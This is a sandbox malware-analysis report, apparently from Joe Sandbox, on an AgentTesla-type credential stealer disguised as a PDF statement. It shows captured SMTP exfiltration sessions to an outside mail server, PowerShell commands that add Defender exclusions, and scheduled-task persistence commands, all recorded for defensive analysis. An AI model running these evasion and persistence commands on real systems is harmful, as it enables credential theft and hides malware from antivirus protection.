                                                      Apr 26, 2024 10:36:53.708642006 CEST49785587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:36:53.904931068 CEST5874978550.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:36:53.905142069 CEST49785587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:36:54.102890968 CEST5874978550.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:37:05.498631001 CEST5874978650.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:37:05 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:37:05.498776913 CEST49786587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:37:05.695743084 CEST5874978650.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:37:05.695940971 CEST49786587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:37:05.783169985 CEST5874978750.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:37:05 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:37:05.783319950 CEST49787587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:37:05.833647013 CEST5874978850.87.195.61192.168.2.4220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 02:37:05 -0600
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 26, 2024 10:37:05.833780050 CEST49788587192.168.2.450.87.195.61EHLO 965543
                                                      Apr 26, 2024 10:37:05.894460917 CEST5874978650.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:37:05.979835987 CEST5874978750.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:37:05.979962111 CEST49787587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:37:06.030572891 CEST5874978850.87.195.61192.168.2.4250-box2344.bluehost.com Hello 965543 [102.129.152.220]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 26, 2024 10:37:06.030741930 CEST49788587192.168.2.450.87.195.61STARTTLS
                                                      Apr 26, 2024 10:37:06.193125010 CEST5874978750.87.195.61192.168.2.4220 TLS go ahead
                                                      Apr 26, 2024 10:37:06.230432034 CEST5874978850.87.195.61192.168.2.4220 TLS go ahead

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:10:32:51
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
                                                      Imagebase:0x4d0000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1700653245.0000000003949000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1710196910.0000000007600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:10:32:55
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
                                                      Imagebase:0xfb0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:10:32:55
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:10:32:55
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                                                      Imagebase:0xfb0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:10:32:55
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:10:32:55
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp"
                                                      Imagebase:0xbe0000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:10:32:55
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:10:32:56
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
                                                      Imagebase:0x9f0000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:10
                                                      Start time:10:32:57
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                                                      Imagebase:0x20000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 47%, ReversingLabs
                                                      • Detection: 57%, Virustotal, Browse
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:10:32:58
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff693ab0000
                                                      File size:496'640 bytes
                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:10:33:02
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp"
                                                      Imagebase:0xbe0000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:10:33:02
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:10:33:03
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                                                      Imagebase:0xb0000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:10:33:03
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                                                      Imagebase:0xbe0000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4080192144.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4080192144.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4080192144.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4080192144.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:17
                                                      Start time:10:33:03
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 1816
                                                      Imagebase:0x830000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:18
                                                      Start time:10:33:08
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                      Imagebase:0x7d0000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 47%, ReversingLabs
                                                      • Detection: 57%, Virustotal, Browse
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:20
                                                      Start time:10:33:11
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp44D2.tmp"
                                                      Imagebase:0xbe0000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:21
                                                      Start time:10:33:11
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:22
                                                      Start time:10:33:12
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                      Imagebase:0xfd0000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1928490064.000000000356C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.1928490064.0000000003541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1928490064.0000000003541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.1928490064.0000000003574000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Has exited:true

                                                      General

                                                      Target ID:24
                                                      Start time:10:33:12
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 1828
                                                      Imagebase:0x830000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:25
                                                      Start time:10:33:17
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                      Imagebase:0x4a0000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Has exited:true

                                                      General

                                                      Target ID:28
                                                      Start time:10:33:20
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp6598.tmp"
                                                      Imagebase:0xbe0000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:29
                                                      Start time:10:33:20
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:30
                                                      Start time:10:33:20
                                                      Start date:26/04/2024
                                                      Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                      Imagebase:0x520000
                                                      File size:709'632 bytes
                                                      MD5 hash:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000002.4081952252.000000000294B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001E.00000002.4081952252.000000000294B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Has exited:false

                                                      General

                                                      Target ID:32
                                                      Start time:10:33:20
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7400 -s 1788
                                                      Imagebase:0x830000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:8.8%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:47
                                                        Total number of Limit Nodes:2
                                                        execution_graph 56777 f1df60 56778 f1dfa6 56777->56778 56782 f1e140 56778->56782 56785 f1e130 56778->56785 56779 f1e093 56788 f1daf0 56782->56788 56786 f1e16e 56785->56786 56787 f1daf0 DuplicateHandle 56785->56787 56786->56779 56787->56786 56789 f1e1a8 DuplicateHandle 56788->56789 56790 f1e16e 56789->56790 56790->56779 56813 f1bbd0 56816 f1bcb8 56813->56816 56814 f1bbdf 56817 f1bcd9 56816->56817 56818 f1bcfc 56816->56818 56817->56818 56824 f1bf60 56817->56824 56828 f1bf50 56817->56828 56818->56814 56819 f1bcf4 56819->56818 56820 f1bf00 GetModuleHandleW 56819->56820 56821 f1bf2d 56820->56821 56821->56814 56825 f1bf74 56824->56825 56827 f1bf99 56825->56827 56832 f1b6c8 56825->56832 56827->56819 56829 f1bf74 56828->56829 56830 f1b6c8 LoadLibraryExW 56829->56830 56831 f1bf99 56829->56831 56830->56831 56831->56819 56833 f1c140 LoadLibraryExW 56832->56833 56835 f1c1b9 56833->56835 56835->56827 56791 f14668 56792 f1467a 56791->56792 56793 f14686 56792->56793 56795 f14779 56792->56795 56796 f1479d 56795->56796 56800 f14877 56796->56800 56805 f14888 56796->56805 56801 f147a7 56800->56801 56803 f14887 56800->56803 56801->56793 56802 f1498c 56802->56802 56803->56802 56809 f14538 56803->56809 56806 f148af 56805->56806 56807 f14538 CreateActCtxA 56806->56807 56808 f1498c 56806->56808 56807->56808 56810 f15d18 CreateActCtxA 56809->56810 56812 f15ddb 56810->56812 56836 6cc9ee0 56837 6cc9f2e DrawTextExW 56836->56837 56839 6cc9f86 56837->56839

                                                        Executed Functions

                                                        Function 06CE39C0 Relevance: 11.0, Strings: 8, Instructions: 977COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 294 6ce39c0-6ce39df 296 6ce3b8d-6ce3bcc 294->296 297 6ce39e5-6ce39eb 294->297 322 6ce3bce 296->322 323 6ce3bf3 296->323 298 6ce3a2c-6ce3a40 297->298 299 6ce39ed-6ce39f4 297->299 301 6ce3a62-6ce3a6b 298->301 302 6ce3a42-6ce3a46 298->302 303 6ce3a0e-6ce3a27 call 6ce25d4 299->303 304 6ce39f6-6ce3a03 299->304 306 6ce3a6d-6ce3a7a 301->306 307 6ce3a85-6ce3aa1 301->307 302->301 305 6ce3a48-6ce3a54 302->305 303->298 304->303 305->301 316 6ce3a56-6ce3a5c 305->316 306->307 319 6ce3b49-6ce3b6d 307->319 320 6ce3aa7-6ce3ab2 307->320 316->301 332 6ce3b6f 319->332 333 6ce3b77 319->333 329 6ce3aca-6ce3ad1 320->329 330 6ce3ab4-6ce3aba 320->330 324 6ce3bd4-6ce3bde 322->324 325 6ce3bd0-6ce3bd3 322->325 327 6ce3bf8-6ce3c05 323->327 324->327 331 6ce3be0-6ce3bed 324->331 325->324 574 6ce3c07 call 6ce3b8c 327->574 575 6ce3c07 call 6ce25d4 327->575 576 6ce3c07 call 6ce39c0 327->576 577 6ce3c07 call 6ce39b0 327->577 578 6ce3c07 call 6ce3991 327->578 336 6ce3ae5-6ce3b08 329->336 337 6ce3ad3-6ce3add 329->337 334 6ce3abe-6ce3ac0 330->334 335 6ce3abc 330->335 331->323 332->333 333->296 334->329 335->329 346 6ce3b0a-6ce3b17 336->346 347 6ce3b19-6ce3b2a 336->347 337->336 339 6ce3c0d-6ce3c12 342 6ce3c59-6ce3c60 339->342 343 6ce3c14-6ce3c1b 339->343 344 6ce3c7a-6ce3c83 342->344 345 6ce3c62-6ce3c6f 342->345 348 6ce3c1d-6ce3c2a 343->348 349 6ce3c35-6ce3c4a 343->349 350 6ce3c89-6ce3c8c 344->350 351 6ce3c85-6ce3c87 344->351 345->344 346->347 358 6ce3b37-6ce3b43 346->358 347->358 359 6ce3b2c-6ce3b2f 347->359 348->349 349->342 360 6ce3c4c-6ce3c53 349->360 353 6ce3c8d-6ce3c9e 350->353 351->353 364 6ce3ca0-6ce3ca7 353->364 365 6ce3ce1-6ce3ce4 353->365 358->319 358->320 359->358 360->342 362 6ce3ce7-6ce3d12 360->362 373 6ce3d19-6ce3d7a 362->373 367 6ce3ca9-6ce3cb6 364->367 368 6ce3cc1-6ce3cd6 364->368 367->368 368->365 372 6ce3cd8-6ce3cdf 368->372 372->365 372->373 381 6ce3d7c-6ce3d7f 373->381 382 6ce3d92-6ce3d98 373->382 385 6ce3d88-6ce3d8f 381->385 383 6ce3d9a-6ce3da1 382->383 384 6ce3e08-6ce3e60 382->384 386 6ce3e67-6ce3ebf 383->386 387 6ce3da7-6ce3db7 383->387 384->386 392 6ce3ec6-6ce3f9c 386->392 391 6ce3dbd-6ce3dc1 387->391 387->392 395 6ce3dc4-6ce3dc6 391->395 433 6ce3fa0-6ce3fb4 392->433 397 6ce3deb-6ce3ded 395->397 398 6ce3dc8-6ce3dd8 395->398 401 6ce3def-6ce3df9 397->401 402 6ce3dfc-6ce3e05 397->402 407 6ce3dda-6ce3de9 398->407 408 6ce3dc3 398->408 407->397 407->408 408->395 433->433 434 6ce3fb6-6ce3fd4 433->434 435 6ce4026-6ce407e 434->435 436 6ce3fd6-6ce3fe6 434->436 440 6ce4085-6ce415b 435->440 439 6ce3fec-6ce3ff0 436->439 436->440 442 6ce3ff3-6ce3ff5 439->442 473 6ce4160-6ce4170 440->473 444 6ce4009-6ce400b 442->444 445 6ce3ff7-6ce4007 442->445 446 6ce400d-6ce4017 444->446 447 6ce401a-6ce4023 444->447 445->444 452 6ce3ff2 445->452 452->442 474 6ce41a6-6ce41a7 473->474 475 6ce4172-6ce4174 473->475 475->473 476 6ce4176-6ce4192 475->476 477 6ce41aa-6ce41b0 476->477 478 6ce4194-6ce41a5 476->478 479 6ce422a-6ce4282 477->479 480 6ce41b2-6ce41b9 477->480 478->474 482 6ce4289-6ce42e1 479->482 481 6ce41bf-6ce41c3 480->481 480->482 484 6ce42e8-6ce43ec 481->484 485 6ce41c9-6ce41cd 481->485 482->484 530 6ce43ee-6ce43f2 484->530 531 6ce4448-6ce44a0 484->531 487 6ce41d0-6ce41dd 485->487 494 6ce41df-6ce41ef 487->494 495 6ce4202-6ce420f 487->495 504 6ce41cf 494->504 505 6ce41f1-6ce4200 494->505 502 6ce421e-6ce4227 495->502 503 6ce4211-6ce421b 495->503 504->487 505->495 505->504 532 6ce43f8-6ce43fc 530->532 533 6ce44a7-6ce45a0 530->533 531->533 535 6ce43ff-6ce440c 532->535 570 6ce45b8-6ce45b9 533->570 571 6ce45a2-6ce45a8 533->571 539 6ce440e-6ce441e 535->539 540 6ce4420-6ce442d 535->540 539->540 547 6ce43fe 539->547 548 6ce442f-6ce4439 540->548 549 6ce443c-6ce4445 540->549 547->535 572 6ce45ac-6ce45ae 571->572 573 6ce45aa 571->573 572->570 573->570 574->339 575->339 576->339 577->339 578->339
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
